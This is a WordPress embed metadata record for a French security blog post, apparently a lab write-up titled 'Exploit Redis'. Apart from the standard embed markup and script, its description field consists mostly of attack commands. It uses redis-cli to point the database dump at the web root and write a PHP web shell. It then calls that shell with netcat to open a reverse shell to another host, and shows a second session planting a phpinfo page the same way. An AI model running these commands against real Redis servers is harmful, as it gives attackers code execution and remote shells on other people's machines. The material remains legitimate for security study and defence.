{"version":"1.0","provider_name":"S\u00e9curiser votre site","provider_url":"https:\/\/www.searchevolution.com\/security","author_name":"Germain","author_url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/","title":"Exploit Redis - S\u00e9curiser votre site","type":"rich","width":600,"height":338,"html":"<blockquote class=\"wp-embedded-content\" data-secret=\"UJQspopt2k\"><a href=\"https:\/\/www.searchevolution.com\/security\/2021\/07\/01\/exploit-redis\/\">Exploit Redis<\/a><\/blockquote><iframe sandbox=\"allow-scripts\" security=\"restricted\" src=\"https:\/\/www.searchevolution.com\/security\/2021\/07\/01\/exploit-redis\/embed\/#?secret=UJQspopt2k\" width=\"600\" height=\"338\" title=\"&laquo; Exploit Redis &raquo; &#8212; S\u00e9curiser votre site\" data-secret=\"UJQspopt2k\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\" class=\"wp-embedded-content\"><\/iframe><script type=\"text\/javascript\">\n\/* <![CDATA[ *\/\n\/*! This file is auto-generated *\/\n!function(d,l){\"use strict\";l.querySelector&&d.addEventListener&&\"undefined\"!=typeof URL&&(d.wp=d.wp||{},d.wp.receiveEmbedMessage||(d.wp.receiveEmbedMessage=function(e){var t=e.data;if((t||t.secret||t.message||t.value)&&!\/[^a-zA-Z0-9]\/.test(t.secret)){for(var s,r,n,a=l.querySelectorAll('iframe[data-secret=\"'+t.secret+'\"]'),o=l.querySelectorAll('blockquote[data-secret=\"'+t.secret+'\"]'),c=new RegExp(\"^https?:$\",\"i\"),i=0;i<o.length;i++)o[i].style.display=\"none\";for(i=0;i<a.length;i++)s=a[i],e.source===s.contentWindow&&(s.removeAttribute(\"style\"),\"height\"===t.message?(1e3<(r=parseInt(t.value,10))?r=1e3:~~r<200&&(r=200),s.height=r):\"link\"===t.message&&(r=new URL(s.getAttribute(\"src\")),n=new URL(t.value),c.test(n.protocol))&&n.host===r.host&&l.activeElement===s&&(d.top.location.href=t.value))}},d.addEventListener(\"message\",d.wp.receiveEmbedMessage,!1),l.addEventListener(\"DOMContentLoaded\",function(){for(var e,t,s=l.querySelectorAll(\"iframe.wp-embedded-content\"),r=0;r<s.length;r++)(t=(e=s[r]).getAttribute(\"data-secret\"))||(t=Math.random().toString(36).substring(2,12),e.src+=\"#?secret=\"+t,e.setAttribute(\"data-secret\",t)),e.contentWindow.postMessage({message:\"ready\",secret:t},\"*\")},!1)))}(window,document);\n\/* ]]> *\/\n<\/script>\n","description":"redis-cli -h 10.9.0.19 config set dir \/var\/www\/html config set dbfilename shell.php set test &quot;&lt;?php system($_GET);?&gt; http:\/\/10.9.0.19\/shell.php?cmd=nc 10.9.0.15 4444 -e \/bin\/sh S&#8217;il y a un exception, vous pouvez r\u00e9essayer apr\u00e8s avoir fait un backup et vid\u00e9 la base de donn\u00e9es. Ne pas oublier de restorer la bd Get Webshell \u200b You must know the physical path of the Web site root@kali:~# redis-cli -h 10.85.0.52 10.85.0.52:6379&gt; config set dir \/usr\/share\/nginx\/html OK 10.85.0.52:6379&gt; config set dbfilename redis.php OK 10.85.0.52:6379&gt; set test &quot;&lt;?php phpinfo(); ?&gt;&quot; OK 10.85.0.52:6379&gt; save OK \u200b If the webshell access exception, you can empty the database after backup and try"}